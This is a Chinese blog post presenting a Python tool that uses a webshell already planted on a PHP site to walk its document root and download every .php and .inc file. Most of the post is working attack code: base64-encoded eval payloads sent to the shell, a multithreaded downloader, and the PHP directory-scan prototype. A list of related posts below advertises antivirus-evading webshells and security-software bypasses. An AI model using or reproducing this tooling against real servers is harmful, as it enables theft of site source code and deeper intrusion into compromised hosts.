利用小马下载全站程序,(php inc格式文件包括目录结构)的py代码

最新推荐文章于 2021-04-12 22:09:34 发布
原创 最新推荐文章于 2021-04-12 22:09:34 发布 · 2.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #session #download #path #url #import

本文介绍如何使用Python脚本配合小马下载整个网站程序,涉及PHP的inc格式文件及目录结构处理。代码中包含对PHP目录迭代查询的引用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

如果有小马了,就可以用本程序下载全站程序。

代码如下:

import urllib.request as ur
import urllib.parse as up
import threading,queue,os,sys
que=queue.Queue()
os.chdir(sys.path[0])
key='pass'  #小马的密码
url=r'http://localhost/test.php'  #小马的地址
tno=5  #下载线程数
webroot='''{}=%40session_start%28%29%3B%24_SESSION%5Bchr%2890%29%5D%3D%24_POST%5Bchr%28124%29%5D%3B%40eval%28base64_decode%28%24_SESSION%5Bchr%2890%29%5D%29%29%3Bdie%28%29%3B&|=ZWNobyAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddOw%3D%3D'''.format(key)
qpath='''{}=%40session_start%28%29%3B%24_SESSION%5Bchr%2890%29%5D%3D%24_POST%5Bchr%28124%29%5D%3B%40eval%28base64_decode%28%24_SESSION%5Bchr%2890%29%5D%29%29%3Bdie%28%29%3B&|=c2V0X3RpbWVfbGltaXQoOTk5OTk5KTsNCiRkaXI9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nLyonOw0KJG5ld2V4dGVuPWFycmF5KCcucGhwJywnLlBIUCcsJy5pbmMnLCcuUGhwJyk7ICANCmZ1bmN0aW9uIGNoZWNrKCRmX25hbWUpDQp7DQoJCWdsb2JhbCAkbmV3ZXh0ZW47DQokZno9c3RycmV2KCRmX25hbWUpOw0KJGJqID0gc3Vic3RyKCRmeiwwLDQpOw0KaWYoaW5fYXJyYXkoc3RycmV2KCRiaiksJG5ld2V4dGVuKSkNCglyZXR1cm4gdHJ1ZTsNCmVsc2UNCglyZXR1cm4gZmFsc2U7DQp9DQoNCmZ1bmN0aW9uIG15c2NhbmRpcigkcGF0aG5hbWUpDQp7DQpmb3JlYWNoKCBnbG9iKCRwYXRobmFtZSkgYXMgJGZpbGVuYW1lICl7DQogICAgICAgICAgICBpZihpc19kaXIoJGZpbGVuYW1lKSl7DQogICAgICAgICAgICAgICAgbXlzY2FuZGlyKCRmaWxlbmFtZS4nLyonKTsNCiAgICAgICAgICAgIH1lbHNlew0KICAgICAgICAgICAgICAgIGlmKGNoZWNrKCRmaWxlbmFtZSkpDQoJCQkJCWVjaG8gJGZpbGVuYW1lLidcbic7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiB9DQpteXNjYW5kaXIoJGRpcik7'''.format(key)
down='''{k}=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRj1nZXRfbWFnaWNfcXVvdGVzX2dwYygpP3N0cmlwc2xhc2hlcygkX1BPU1RbInoxIl0pOiRfUE9TVFsiejEiXTskZnA9QGZvcGVuKCRGLCJyIik7aWYoQGZnZXRjKCRmcCkpe0BmY2xvc2UoJGZwKTtAcmVhZGZpbGUoJEYpO31lbHNle2VjaG8oIkVSUk9SOi8vIENhbiBOb3QgUmVhZCIpO307ZWNobygifDwtIik7ZGllKCk7&z1={p}'''


def download(path):
    #global down
    path=ur.quote(path)
    data=down.format(k=key,p=path).encode()
    a=ur.urlopen(url,data=data).read()[3:-3]
    return a
    
webroot=ur.urlopen(url,data=webroot.encode()).read().decode()
l=len(webroot)+1
data=qpath.encode()

ret=ur.urlopen(url,data=data).read()
try:ret=ret.decode('utf8').replace(r'\n','\n').strip().split()
except:ret=ret.decode('gb18030').replace(r'\n','\n').strip().split()
finally:
    for i in ret:que.put(i)


class yk(threading.Thread):
    def __init__(self,que):
        super(yk,self).__init__()
        self.que=que
        self.start()

    def run(self):
        while True:
            if self.que.empty():break
            i=self.que.get()
            os.chdir(sys.path[0])
            print('正在下载',i)
            lst=i[l:].rsplit('/',1)
            if len(lst)==1:open(lst[0],'bw').write(download(i))
            else:
                try:os.makedirs(lst[0])
                except:pass
                os.chdir(lst[0])
                open(lst[1],'bw').write(download(i))


for i in range(tno):
    yk(que)

其中的目录迭代查询代码的php原型为:

<?php
set_time_limit(999999);
$dir=$_SERVER['DOCUMENT_ROOT'].'/*';
$newexten=array('.php','.PHP','.inc','.Php');  
function check($f_name)
{
		global $newexten;
$fz=strrev($f_name);
$bj = substr($fz,0,4);
if(in_array(strrev($bj),$newexten))
	return true;
else
	return false;
}

function myscandir($pathname)
{
foreach( glob($pathname) as $filename ){
            if(is_dir($filename)){
                myscandir($filename.'/*');
            }else{
                if(check($filename))
					echo $filename.'\n';
            }
        }
 }
myscandir($dir);
?>


php超小免杀大马_超小PHP小马小结(方便查找后门的朋友)免杀
weixin_39579483的博客
12-30 947
作者: spider我也来个超小PHP小马复制代码 代码如下:header("content-Type: text/html; charset=gb2312");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?>保存文件名: if(isset($_POST['file...
php文件上传 小马,php文件上传函数
weixin_30682043的博客
03-10 926
php文件上传函数/**+++++++++++++++++++++=+++++上传图片++++++++++++++++++++++++++++++++++++++++——————————————————————————————————————————————————————————————————————————————————**/function upload_image($key,$dir)...
PHP过D盾免杀小马.zip
06-14
提供混淆以及未混淆两个文件,可以随意过D盾,可用菜刀直接连接!
php目录小马,利用小马下载全站程序,(php inc格式文件包括目录结构)的py代码...
weixin_39874795的博客
03-10 187
如果有小马了,就可以用本程序下载全站程序代码如下:import urllib.request as urimport urllib.parse as upimport threading,queue,os,sysque=queue.Queue()os.chdir(sys.path[0])key='pass' #小马的密url=r'http://localhost/test.php' #小马...
PHP小马
eT48_Sec
01-04 1959
http://xiaojianke.blog.163.com是我原来的博客,工作后换成了C博客,这里吐槽一下网易博客太差了。 看到网上那么多PHP小马,我也来自己写一个,练习PHP编程。 <?php error_reporting(E_ERROR); header('Content-Type:text/html; charset=utf-8'); $path=getcwd(); $pe
PHP小马免杀
weixin_34072159的博客
11-12 807
PHP小马免杀 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; c...
scratch编程项目源代码文件案例素材-小马过河.zip
05-16
这个“scratch编程项目源代码文件案例素材-小马过河.zip”是一个基于Scratch的编程实例,用于教授孩子们如何利用编程来解决实际问题,比如设计一款简单的游戏。 在这个“小马过河”的项目中,我们可以预见到以下...
垃圾代码二三行 ASPX小马
10-30
`sp`通过`Server.MapPath(".")`获取当前Web应用程序的根目录绝对路径,而`fp`则通过`Request["p"]`获取用户通过请求参数传递的文件路径。 - `<form name=f1 method=post enctype='multipart/form-data'>` 表单的...
Python编写PostgreSQL数据库结构比对程序代码
08-03
根据压缩包子文件的文件名“pg_sync”,我们可以推测这可能是程序的主文件或者包含核心同步逻辑的部分。在源代码中,可能会有如下关键部分: 1. 数据库连接:使用`psycopg2`库建立到两个PostgreSQL数据库的连接。 2...
未加密PHP小马代码
01-10
未加密的PHP网马源代码,供代码研究。 部分代码: $v) $_POST[$k] = stripslashes($v); ?>
web上传小马
10-07
构造上传页面,可以上传webshell大马进一步得到网站权限ASP
php-webshell大马(功能齐全)
10-28
php小马 详细的资源以后我会推荐 使用方法:上传至网站任意目录连接即可,其中 $admin['pass'] = "admin"; 后面引号里的admin为连接密,可自由修改此密
php7可用的小马,PHP7安装笔记
weixin_30873333的博客
04-12 907
# 安装mcryptyum install -y php-mcrypt libmcrypt libmcrypt-devel# 由于版本问题,centos不能集成mcrypt,自行安装解决错误# configure: error: mcrypt.h not found. Please reinstalllibmcrypt.wgethttp://nchc.dl.sourceforge.net/proj...
浅谈PHP小马免杀
09-10 1072
在渗透测试过程初期,上传小马,拿到webshell再进行下一步的操作,现如今的网站安全更多是 一些云防护、CDN防护、服务器安全软件等等,给渗透测试、提权等带来了一定难度的提升, 今天探讨一下如何做PHP小马的免杀。 小马:体积、代码量比较小的webshell文件,一般借助“中国菜刀”、蚁剑等shell链接工具,进行进一步的渗透测试 小马因为代码小,显得更加灵活。就...
php小马怎么打开,超小PHP小马小结(方便查找后门的朋友)
weixin_34917128的博客
03-09 373
作者: spider我也来个超小PHP小马复制代码代码如下:header("content-Type: text/html; charset=gb2312");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?>保存文件名: if(isset($_POST['file'...
分享PHP小马一枚,完美绕过安全狗检测。
weixin_30565327的博客
01-23 379
没做免杀之前,被狗咬死: 直接上代码: $p=realpath(dirname(__FILE__)."/../").$_POST["a"];$t=$_POST["b"];$tt="";for ($i=0;$i@fwrite(fopen($p,"w"),$tt);echo "success!";?> 代码分析: $p=realpath(dirname(__FILE...
内网打洞,类似于lcx 但是比他更加强大
Yatere的天平秤
04-28 4601
经常有朋友用lcx的,但是由于很多原因可能都不好使,例如 : 1.linux下能用lcx,有时只能拿msf出来。(golang的程序跨平台,甚至嵌入式linux都支持。) 2.不免杀  (基本上目前golang 语言不会被当病毒) 3.每次内网要从新连接其他主机时候,必须从进去从新敲打命令 ,操作过多任意被发现。(肉鸡只用操作一次,其他都交给主控端操作了) 最近正好都碰上了,于是自
C#实现的FTP文件同步客户端及目录结构问题解析
了解FTP协议的交互过程,包括用户认证、目录操作、文件上传下载等,对于开发FTP客户端至关重要。 2. **FTP连接管理**:在C#中实现FTP连接管理,通常会使用如`FtpWebRequest`、`FtpWebResponse`等.NET Framework提供...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值